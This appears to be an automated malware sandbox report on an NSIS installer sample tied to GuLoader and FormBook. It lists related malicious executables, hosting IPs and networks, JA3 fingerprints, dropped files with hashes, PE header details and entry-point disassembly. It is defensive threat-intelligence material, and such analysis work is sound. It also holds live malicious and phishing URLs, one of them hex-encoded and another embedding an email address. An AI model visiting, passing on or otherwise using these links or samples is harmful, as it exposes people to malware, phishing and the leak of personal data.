                                                                                                                                                            https://youtube.com0x360x380x370x340x370x340x370x300x370x330x330x610x320x660x320x660x360x310x360x640x360x360x370x320x320x650x370x320x370x350x320x660x370x320x360x620x320x650x370x300x360x380x370x300x330x660x360x390x360x340x330x640x330x320x330x300x330x300x320x360x370x330x360x390x370x340x360x350x350x660x360x390x360x340x330x640x370x330x330x310x320x360x360x350x370x360x360x350x360x650x370x340x330x320x330x640x360x320x360x310x360x650x360x650x360x350x370x320x320x360x360x350x370x360x360x350x360x650x370x340x330x320x330x640x360x330x360x630x360x390x360x330x360x620x320x360x360x350x370x360x360x350x360x650x370x340x330x330x330x640x330x310x320x620x320x350x330x320x340x360x320x620x320x350x330x350x340x320x330x320x330x350x330x300x320x350x330x350x340x340x320x620x320x350x330x350x340x320x360x390x360x650x360x340x360x350x370x380x350x660x360x320x350x660x360x330x320x350x330x350x340x340x320x620x320x350x340x340x330x300x320x350x330x390x330x330x320x350x340x340x330x300x320x350x340x320x340x320x320x350x340x340x330x300x320x350x340x320x330x300x320x350x340x340x330x300x320x350x340x320x330x320x320x350x340x340x330x300x320x350x340x320x340x340x320x350x340x340x330x300x320x350x340x320x330x300x320x350x340x340x330x310x320x350x330x380x340x360x320x620x320x350x340x340x330x310x320x350x330x380x330x310x320x350x340x340x330x310x320x350x330x380x330x320x320x350x340x340x330x340x370x380x360x340x390x320x390x330x370x320x330x300x390x340x370x330x340x300x330x340x2d0x380x380x340x330x340x370x330x340x300x340x390x300x350x370x330x370x340x330x300x340x300x330x340x380x320x2d0x340x300x390x340x380x2d0x320x2d0x340x380x380x320x2d0x330x320x380x380x340x370x370x320x390x390x320x380x380x380x340x370x340x370x320x390x300x340x390x340x370x320x340x300x380x320x340x370x340x370x320x620x320x640x320x620x320x350x340x340x330x300x320x350x330x390x330x340x320x350x340x340x330x300x320x350x340x320x330x350x320x350x340x340x330x300x320x350x340x320x340x330x320x350x340x340x330x300x320x350x340x320x330x380x320x350x340x340x330x300x320x350x340x320x340x310x320x350x340x340x330Get hashmaliciousUnknownBrowse
                                                                                                                                                            • 142.250.184.228
                                                                                                                                                            ro7eoySJ9q.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                            • 142.250.181.225
                                                                                                                                                            ro7eoySJ9q.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                            • 142.250.181.225
                                                                                                                                                            4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                            • 142.250.186.33
                                                                                                                                                            ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                            • 142.250.185.65
                                                                                                                                                            YrCSUX2O3I.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                            • 142.250.181.225
                                                                                                                                                            4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                            • 142.250.185.129
                                                                                                                                                            4AMVusDMPP.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                            • 172.217.16.193
                                                                                                                                                            www.optimismbank.xyzsuBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 13.248.169.48
                                                                                                                                                            Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                            • 13.248.169.48
                                                                                                                                                            Proforma invoice - Arancia NZ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 13.248.169.48
                                                                                                                                                            PAYROLL LIST.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 13.248.169.48
                                                                                                                                                            SWIFT COPY 0028_pdf.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 13.248.169.48

                                                                                                                                                            ASNs

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            CLOUDFLARENETUS5hD3Yjf7xD.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                            • 172.67.74.152
                                                                                                                                                            MBOaS3GRtF.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                            • 104.21.64.1
                                                                                                                                                            https://freesourcecodes70738.emlnk.com/lt.php?x=3DZy~GDLVnab5KCs-Nu4WOae1qEoiN9xvxk1XaPMVXahD5B9-Uy.xuW-242imNXGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 104.17.205.31
                                                                                                                                                            https://youtube.com0x360x380x370x340x370x340x370x300x370x330x330x610x320x660x320x660x360x310x360x640x360x360x370x320x320x650x370x320x370x350x320x660x370x320x360x620x320x650x370x300x360x380x370x300x330x660x360x390x360x340x330x640x330x320x330x300x330x300x320x360x370x330x360x390x370x340x360x350x350x660x360x390x360x340x330x640x370x330x330x310x320x360x360x350x370x360x360x350x360x650x370x340x330x320x330x640x360x320x360x310x360x650x360x650x360x350x370x320x320x360x360x350x370x360x360x350x360x650x370x340x330x320x330x640x360x330x360x630x360x390x360x330x360x620x320x360x360x350x370x360x360x350x360x650x370x340x330x330x330x640x330x310x320x620x320x350x330x320x340x360x320x620x320x350x330x350x340x320x330x320x330x350x330x300x320x350x330x350x340x340x320x620x320x350x330x350x340x320x360x390x360x650x360x340x360x350x370x380x350x660x360x320x350x660x360x330x320x350x330x350x340x340x320x620x320x350x340x340x330x300x320x350x330x390x330x330x320x350x340x340x330x300x320x350x340x320x340x320x320x350x340x340x330x300x320x350x340x320x330x300x320x350x340x340x330x300x320x350x340x320x330x320x320x350x340x340x330x300x320x350x340x320x340x340x320x350x340x340x330x300x320x350x340x320x330x300x320x350x340x340x330x310x320x350x330x380x340x360x320x620x320x350x340x340x330x310x320x350x330x380x330x310x320x350x340x340x330x310x320x350x330x380x330x320x320x350x340x340x330x340x370x380x360x340x390x320x390x330x370x320x330x300x390x340x370x330x340x300x330x340x2d0x380x380x340x330x340x370x330x340x300x340x390x300x350x370x330x370x340x330x300x340x300x330x340x380x320x2d0x340x300x390x340x380x2d0x320x2d0x340x380x380x320x2d0x330x320x380x380x340x370x370x320x390x390x320x380x380x380x340x370x340x370x320x390x300x340x390x340x370x320x340x300x380x320x340x370x340x370x320x620x320x640x320x620x320x350x340x340x330x300x320x350x330x390x330x340x320x350x340x340x330x300x320x350x340x320x330x350x320x350x340x340x330x300x320x350x340x320x340x330x320x350x340x340x330x300x320x350x340x320x330x380x320x350x340x340x330x300x320x350x340x320x340x310x320x350x340x340x330Get hashmaliciousUnknownBrowse
                                                                                                                                                            • 172.64.41.3
                                                                                                                                                            fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                            • 104.21.48.1
                                                                                                                                                            fpIGwanLZi.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                            • 104.21.48.1
                                                                                                                                                            AJ5zYYsisA.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 188.114.97.3
                                                                                                                                                            1SxKeB4u0c.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 104.21.95.160
                                                                                                                                                            SpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 104.21.64.1
                                                                                                                                                            AJ5zYYsisA.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 188.114.96.3
                                                                                                                                                            AMAZON-02USzAg7xx1vKI.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 13.248.169.48
                                                                                                                                                            1SxKeB4u0c.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 18.141.10.107
                                                                                                                                                            SpCuEoekPa.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 13.228.81.39
                                                                                                                                                            suBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 13.248.169.48
                                                                                                                                                            5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 157.175.218.227
                                                                                                                                                            BzK8rQh2O3.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 18.141.10.107
                                                                                                                                                            k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 18.163.74.139
                                                                                                                                                            e47m9W6JGQ.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 13.248.169.48
                                                                                                                                                            XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 18.163.74.139
                                                                                                                                                            http://www.jadavisinjurylawyers.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                            • 54.231.128.160
                                                                                                                                                            DREAMSCAPE-AS-APDreamscapeNetworksLimitedAUhttp://www.austrata.net.auGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 185.184.154.201
                                                                                                                                                            https://snip.ly/kx81x2Get hashmaliciousUnknownBrowse
                                                                                                                                                            • 203.170.87.17
                                                                                                                                                            la.bot.arm5.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                            • 103.226.223.88
                                                                                                                                                            https://www.google.co.id/url?q=sf_rand(2000)CHARtTPSJ3J3wDyycT&sa=t&esrc=sf_rand(2000)gECA0xys8Em2FL&source=&cd=HXUursu8uEcr4eTiw9XH&cad=sf_rand(2000)RlDJVS0YXpPkDfJ6C&ved=xjnktlqryYWwZIBRrgvK&uact=&url=amp/apcarpetcleaning.com.au%2Fkom%2Fwp-images%2Fpoom%0A%2Fsf_rand_string_mixed(24)/tmitchell@encorecompliance.comGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 203.170.84.122
                                                                                                                                                            Last Annual payment.htmGet hashmaliciousPhisherBrowse
                                                                                                                                                            • 203.170.84.122
                                                                                                                                                            http://www.therowlands.com.au/wp-includes/js/jquery/jquery-migrate.min.jsGet hashmaliciousUnknownBrowse
                                                                                                                                                            • 203.170.86.89
                                                                                                                                                            PURCHASE REQUIRED DETAILS 000487958790903403.exeGet hashmaliciousDBatLoader, MassLogger RAT, PureLog StealerBrowse
                                                                                                                                                            • 103.20.200.105
                                                                                                                                                            Document_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                            • 122.201.127.17
                                                                                                                                                            http://nxsnsstwhbaf.apexhallechuca.com.au/?userid=bHN3ZXN0LXN5c0BudHRscy5jby5qcA==Get hashmaliciousUnknownBrowse
                                                                                                                                                            • 203.170.87.17
                                                                                                                                                            http://nxsnsstwhbaf.apexhallechuca.com.au/?userid=bHN3ZXN0LXN5c0BudHRscy5jby5qcA==Get hashmaliciousUnknownBrowse
                                                                                                                                                            • 203.170.87.17
                                                                                                                                                            MULTIBAND-NEWHOPEUSsuBpo1g13Q.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 209.74.77.109
                                                                                                                                                            k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 209.74.79.41
                                                                                                                                                            XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 209.74.79.41
                                                                                                                                                            BcF3o0Egke.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 209.74.77.109
                                                                                                                                                            hgq5nzWJll.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 209.74.79.42
                                                                                                                                                            5CTbduoXq4.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 209.74.77.107
                                                                                                                                                            gH3LlhcRzg.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 209.74.79.40
                                                                                                                                                            0Wu31IhwGO.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 209.74.77.107
                                                                                                                                                            NFhRxwbegd.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 209.74.77.107
                                                                                                                                                            9MZZG92yMO.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                            • 209.74.79.41

                                                                                                                                                            JA3 Fingerprints

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            37f463bf4616ecd445d4a1937da06e19LMSxhK1u8Z.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                            • 122.201.127.17
                                                                                                                                                            ro7eoySJ9q.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                            • 122.201.127.17
                                                                                                                                                            ro7eoySJ9q.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                            • 122.201.127.17
                                                                                                                                                            4NG0guPiKA.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                            • 122.201.127.17
                                                                                                                                                            ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                            • 122.201.127.17
                                                                                                                                                            YrCSUX2O3I.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                            • 122.201.127.17
                                                                                                                                                            4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                                                                            • 122.201.127.17
                                                                                                                                                            4AMVusDMPP.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                            • 122.201.127.17
                                                                                                                                                            Cpfkf79Rzk.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                            • 122.201.127.17
                                                                                                                                                            TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                                            • 122.201.127.17

                                                                                                                                                            Dropped Files

                                                                                                                                                            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                            C:\Users\user\AppData\Local\Temp\nsbF672.tmp\System.dllDocument_084462.scr.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                              Document_084462.scr.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                PO.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                  PO.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                    yuc1Jwlkh5.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                      yuc1Jwlkh5.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                        IMAGE000Pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                                          stormskridtets.exeGet hashmaliciousFormBook, GuLoaderBrowse
                                                                                                                                                                            IMAGE000Pdf.exeGet hashmaliciousFormBook, GuLoaderBrowse

                                                                                                                                                                              Created / dropped Files

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\FxK39HI69

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Windows\SysWOW64\waitfor.exe
                                                                                                                                                                              File Type:SQLite 3.x database, last written using SQLite version 3036000, page size 2048, file counter 7, database pages 59, cookie 0x52, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):135168
                                                                                                                                                                              Entropy (8bit):1.1142956103012707
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:8t4nKTjebGA7j9p/XH9eQ3KvphCNKRmquPWTPVusE6kvjd:8t4n/9p/39J6hwNKRmqu+7VusEtrd
                                                                                                                                                                              MD5:E3F9717F45BF5FFD0A761794A10A5BB5
                                                                                                                                                                              SHA1:EBD823E350F725F29A7DE7971CD35D8C9A5616CC
                                                                                                                                                                              SHA-256:D79535761C01E8372CCEB75F382E912990929624EEA5D7093A5A566BAE069C70
                                                                                                                                                                              SHA-512:F12D2C7B70E898ABEFA35FEBBDC28D264FCA071D66106AC83F8FC58F40578387858F364C838E69FE8FC66645190E1CB2B4B63791DDF77955A1C376424611A85D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                              Preview:SQLite format 3......@ .......;...........R......................................................S`...........5........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Users\user\AppData\Local\Temp\nsbF672.tmp\System.dll

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\02Eh1ah35H.exe
                                                                                                                                                                              File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):12288
                                                                                                                                                                              Entropy (8bit):5.737556724687435
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:192:MenY0qWTlt70IAj/lQ0sEWc/wtYbBH2aDybC7y+XBaIwL:M8+Qlt70Fj/lQRY/9VjjgL
                                                                                                                                                                              MD5:6E55A6E7C3FDBD244042EB15CB1EC739
                                                                                                                                                                              SHA1:070EA80E2192ABC42F358D47B276990B5FA285A9
                                                                                                                                                                              SHA-256:ACF90AB6F4EDC687E94AAF604D05E16E6CFB5E35873783B50C66F307A35C6506
                                                                                                                                                                              SHA-512:2D504B74DA38EDC967E3859733A2A9CACD885DB82F0CA69BFB66872E882707314C54238344D45945DC98BAE85772ACEEF71A741787922D640627D3C8AE8F1C35
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Antivirus:
                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                              Joe Sandbox View:
                                                                                                                                                                              • Filename: Document_084462.scr.exe, Detection: malicious, Browse
                                                                                                                                                                              • Filename: Document_084462.scr.exe, Detection: malicious, Browse
                                                                                                                                                                              • Filename: PO.exe, Detection: malicious, Browse
                                                                                                                                                                              • Filename: PO.exe, Detection: malicious, Browse
                                                                                                                                                                              • Filename: yuc1Jwlkh5.exe, Detection: malicious, Browse
                                                                                                                                                                              • Filename: yuc1Jwlkh5.exe, Detection: malicious, Browse
                                                                                                                                                                              • Filename: IMAGE000Pdf.exe, Detection: malicious, Browse
                                                                                                                                                                              • Filename: stormskridtets.exe, Detection: malicious, Browse
                                                                                                                                                                              • Filename: IMAGE000Pdf.exe, Detection: malicious, Browse
                                                                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                                                                              Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......qr*.5.D.5.D.5.D...J.2.D.5.E.!.D.....2.D.a0t.1.D.V1n.4.D..3@.4.D.Rich5.D.........PE..L...X..`...........!....."...........).......@...............................p............@..........................B.......@..P............................`.......................................................@..X............................text...O .......".................. ..`.rdata..c....@.......&..............@..@.data...x....P.......*..............@....reloc.......`.......,..............@..B................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Causer\Umpiress240.biv

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\02Eh1ah35H.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):222131
                                                                                                                                                                              Entropy (8bit):1.2548431305039245
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:I2mmH3AhfHp+POGgRSRFZHl2bxYLbBjJ4tFGZjDyYqIx3x9+6yiKk+vlK5u5DF+G:UoNwkuoHtyiKJlQVD
                                                                                                                                                                              MD5:C018B5D87F38B0DBA90AFE75F72B6798
                                                                                                                                                                              SHA1:9B43AE84826B712BB8152D70D2D7B929DB5CE3E2
                                                                                                                                                                              SHA-256:323B7D5F0C7A4F9FA87D8F6DD9A18E81F4284C31DA4FDD5FFE7022501445FD1C
                                                                                                                                                                              SHA-512:D4D6A99EBA1F594BA4052F4C83C93946749EE7524D5765CFD67C0CD34BBA3F1ABBDEA259EBE155A3767898AAE806E29E42BE6539C4A2DC067730EC6D9655ECD5
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.....................................%..................................................................................................................L....B..............................I...........]...........i.........A............\............................................................................................................................................................................................&..............s............................................................................(........].........................................................................,..............]...............F..............G....+..............................................F..............9...........,........i.............................................................................................h...k........................Y......k..........................................................U..........R..................................C...........e..................

                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Causer\potmaker.sti

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\02Eh1ah35H.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):477418
                                                                                                                                                                              Entropy (8bit):1.2516735777117096
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:1536:BugSY71rrh1lxz0ZSyCjm0eydI6Vl73+ByRgN:F7Zrh4SvQy3SBGgN
                                                                                                                                                                              MD5:B86B0A4CFA46775BAEEE023CCECA54E1
                                                                                                                                                                              SHA1:16BABC347EBFC80762D73A12FF39E5ADE55EC7DB
                                                                                                                                                                              SHA-256:7B1E45A0398C8428C6CF476DAE264102A842FACC20930B57688960046FF087F6
                                                                                                                                                                              SHA-512:42787A7037E7D117D82AF3580306C7C10854B279CEC0B38956217B4E04222B34EAC50763B0DB850454DC0AA43B5238297D39FC8E5A681C805966E0BCCD4E7C0D
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:.................................E..............................................................................................................................F......................................./..............#...........n...t..>..........]...............".................|................................4...........s...z......................................................................................U......................................................................J...............................................................j......................-......."...._..............;.............X........................3.H....................................P........#...............L.....................................,......................................R........&..............................................................................................................`<.....f......E..al.....................S..........................................V..............

                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Heteroscian.Gen

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\02Eh1ah35H.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):273298
                                                                                                                                                                              Entropy (8bit):7.755785174749238
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:6144:qz5senqHDSrcDmVvWHleK1735QPec3p/v1m/inzYS5O:qVF8WcDSvWH8K9pQmcvyGYX
                                                                                                                                                                              MD5:EF147A600EB913E453C8376095C627C5
                                                                                                                                                                              SHA1:C610761555E74460763F6737740644C683A92B54
                                                                                                                                                                              SHA-256:B22893A26EE265E7F901FB92E115CB5C8A483A56800CB7D85F435AD4A042B61E
                                                                                                                                                                              SHA-512:3F96C9D5D2B7427E79EFC829325C9911C861BA49FAAEF525B8826C6829FF1485FFDBD64A83BF98193B3D97E1E854416322A6AF6C4F98CE79677EFD1006179C40
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:...............!.yy........33.....E............;;;;........................55....tt.2."...............#....................a.%%%.www.t.4..V...........;;......xxxx......l...................................b.p.........33................................W...G.............dd..................XXX...............D......EE..2........................v.............................-......*.....[.|||.............E.................<<<...(((....,,......?...o....:..??...........uuu......~................#.GG..................M.....####.^.........6..m.....................v.4..xxx..........cc.........w...&&...........B....ii...q.........v....J.FFFF....$....................Z.555.b.vvvv....T...........777..U..........................]]]..........66.]]..TTT...``.rr..........pp...............////.........DDDD...[[[.>....................CCC..l...,,,...........$....bbb............................UU..............|........n...........I......@@@........l...((......Z.FF.B...x........^............................]

                                                                                                                                                                              C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\inspires\Sulfoforbindelserne.chl

                                                                                                                                                                              Download File
                                                                                                                                                                              Process:C:\Users\user\Desktop\02Eh1ah35H.exe
                                                                                                                                                                              File Type:data
                                                                                                                                                                              Category:dropped
                                                                                                                                                                              Size (bytes):116773
                                                                                                                                                                              Entropy (8bit):1.2617404262864118
                                                                                                                                                                              Encrypted:false
                                                                                                                                                                              SSDEEP:768:4yTqkjNz46YyMqMTGZGi7vk59sktCQ3am6ZRN8rOFlS70dhEr:0avCLJ
                                                                                                                                                                              MD5:753C4F9B2F84095556E2C65E2569D814
                                                                                                                                                                              SHA1:3F878C44B311B8C34B2A6E09F49324D42FAD1437
                                                                                                                                                                              SHA-256:E6DCE06287ACEBCFB23DA58EAC6AAA36E253BADB493125F47E801B99C4E48B25
                                                                                                                                                                              SHA-512:8C19F357F4A59D5CB493F418C82B0D06ECED25EC9D05E9B1CFF943A6A79232DC6B2EBC3552B0BFBA76018A7FCEFE8A0410ADEE739151640F149884A4FC3DF651
                                                                                                                                                                              Malicious:false
                                                                                                                                                                              Preview:..................................................V...................Y..Y................................................................................................................M.......................................................................................*.......................`...............................................A................D....D....................................................."................................................l.............\.....%....:......*.......................................................................................c.....M........?......................5........G...................................................U.........................................................................5.8...s................[.....m.....{...........................)$..................................................lm.....................................................}................................................................

                                                                                                                                                                              Static File Info

                                                                                                                                                                              General

                                                                                                                                                                              File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                                                                                                                              Entropy (8bit):7.958584060074148
                                                                                                                                                                              TrID:
                                                                                                                                                                              • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                                                              • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                                                              • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                                                              • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                              File name:02Eh1ah35H.exe
                                                                                                                                                                              File size:441'369 bytes
                                                                                                                                                                              MD5:8b28f25bafe08a5b838ee152a75d14ae
                                                                                                                                                                              SHA1:ed2b19ce4a23e1bb09f76658f9b257baaa4d7f59
                                                                                                                                                                              SHA256:8c4c1550cb63a4c8abebb1ef8a7601953c6c1f0d02f1080f1fb7adc306b99c31
                                                                                                                                                                              SHA512:297bb7e67bcdfb588c521909dc10d012f5b2c8a05f2ffb8c66a74c4101cdfd6d0182879aaad71cf8e4c73bcd59245140f9463046049c0424d474a3016e8c6f76
                                                                                                                                                                              SSDEEP:12288:B3UTPUWt3mXGKr3UnWyPOHBieD7e5QuZN9sUS0zT:B3UTMWt3mXGOUWy5Z0US0z
                                                                                                                                                                              TLSH:2B9422A1A7A0523BC1E71672286627334EDFAC63383943570F247F993DB61438B576A3
                                                                                                                                                                              File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........!`G.@...@...@../OQ..@...@..I@../OS..@...c>..@..+F...@..Rich.@..........................PE..L......`.................f....:....

                                                                                                                                                                              File Icon

                                                                                                                                                                              Icon Hash:3d2e0f95332b3399

                                                                                                                                                                              Static PE Info

                                                                                                                                                                              General

                                                                                                                                                                              Entrypoint:0x4034a2
                                                                                                                                                                              Entrypoint Section:.text
                                                                                                                                                                              Digitally signed:false
                                                                                                                                                                              Imagebase:0x400000
                                                                                                                                                                              Subsystem:windows gui
                                                                                                                                                                              Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                                                                                                                              DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                                                                                              Time Stamp:0x60FC90D1 [Sat Jul 24 22:14:41 2021 UTC]
                                                                                                                                                                              TLS Callbacks:
                                                                                                                                                                              CLR (.Net) Version:
                                                                                                                                                                              OS Version Major:4
                                                                                                                                                                              OS Version Minor:0
                                                                                                                                                                              File Version Major:4
                                                                                                                                                                              File Version Minor:0
                                                                                                                                                                              Subsystem Version Major:4
                                                                                                                                                                              Subsystem Version Minor:0
                                                                                                                                                                              Import Hash:6e7f9a29f2c85394521a08b9f31f6275

                                                                                                                                                                              Entrypoint Preview

                                                                                                                                                                              Instruction
                                                                                                                                                                              sub esp, 000002D4h
                                                                                                                                                                              push ebx
                                                                                                                                                                              push esi
                                                                                                                                                                              push edi
                                                                                                                                                                              push 00000020h
                                                                                                                                                                              pop edi
                                                                                                                                                                              xor ebx, ebx
                                                                                                                                                                              push 00008001h
                                                                                                                                                                              mov dword ptr [esp+14h], ebx
                                                                                                                                                                              mov dword ptr [esp+10h], 0040A2E0h
                                                                                                                                                                              mov dword ptr [esp+1Ch], ebx
                                                                                                                                                                              call dword ptr [004080CCh]
                                                                                                                                                                              call dword ptr [004080D0h]
                                                                                                                                                                              and eax, BFFFFFFFh
                                                                                                                                                                              cmp ax, 00000006h
                                                                                                                                                                              mov dword ptr [007A8A6Ch], eax
                                                                                                                                                                              je 00007F7CB8B69043h
                                                                                                                                                                              push ebx
                                                                                                                                                                              call 00007F7CB8B6C331h
                                                                                                                                                                              cmp eax, ebx
                                                                                                                                                                              je 00007F7CB8B69039h
                                                                                                                                                                              push 00000C00h
                                                                                                                                                                              call eax
                                                                                                                                                                              mov esi, 004082B0h
                                                                                                                                                                              push esi
                                                                                                                                                                              call 00007F7CB8B6C2ABh
                                                                                                                                                                              push esi
                                                                                                                                                                              call dword ptr [00408154h]
                                                                                                                                                                              lea esi, dword ptr [esi+eax+01h]
                                                                                                                                                                              cmp byte ptr [esi], 00000000h
                                                                                                                                                                              jne 00007F7CB8B6901Ch
                                                                                                                                                                              push 0000000Bh
                                                                                                                                                                              call 00007F7CB8B6C304h
                                                                                                                                                                              push 00000009h
                                                                                                                                                                              call 00007F7CB8B6C2FDh
                                                                                                                                                                              push 00000007h
                                                                                                                                                                              mov dword ptr [007A8A64h], eax
                                                                                                                                                                              call 00007F7CB8B6C2F1h
                                                                                                                                                                              cmp eax, ebx
                                                                                                                                                                              je 00007F7CB8B69041h
                                                                                                                                                                              push 0000001Eh
                                                                                                                                                                              call eax
                                                                                                                                                                              test eax, eax
                                                                                                                                                                              je 00007F7CB8B69039h
                                                                                                                                                                              or byte ptr [007A8A6Fh], 00000040h
                                                                                                                                                                              push ebp
                                                                                                                                                                              call dword ptr [00408038h]
                                                                                                                                                                              push ebx
                                                                                                                                                                              call dword ptr [00408298h]
                                                                                                                                                                              mov dword ptr [007A8B38h], eax
                                                                                                                                                                              push ebx
                                                                                                                                                                              lea eax, dword ptr [esp+34h]
                                                                                                                                                                              push 000002B4h
                                                                                                                                                                              push eax
                                                                                                                                                                              push ebx
                                                                                                                                                                              push 0079FF08h
                                                                                                                                                                              call dword ptr [0040818Ch]
                                                                                                                                                                              push 0040A2C8h

                                                                                                                                                                              Rich Headers

                                                                                                                                                                              Programming Language:
                                                                                                                                                                              • [EXP] VC++ 6.0 SP5 build 8804

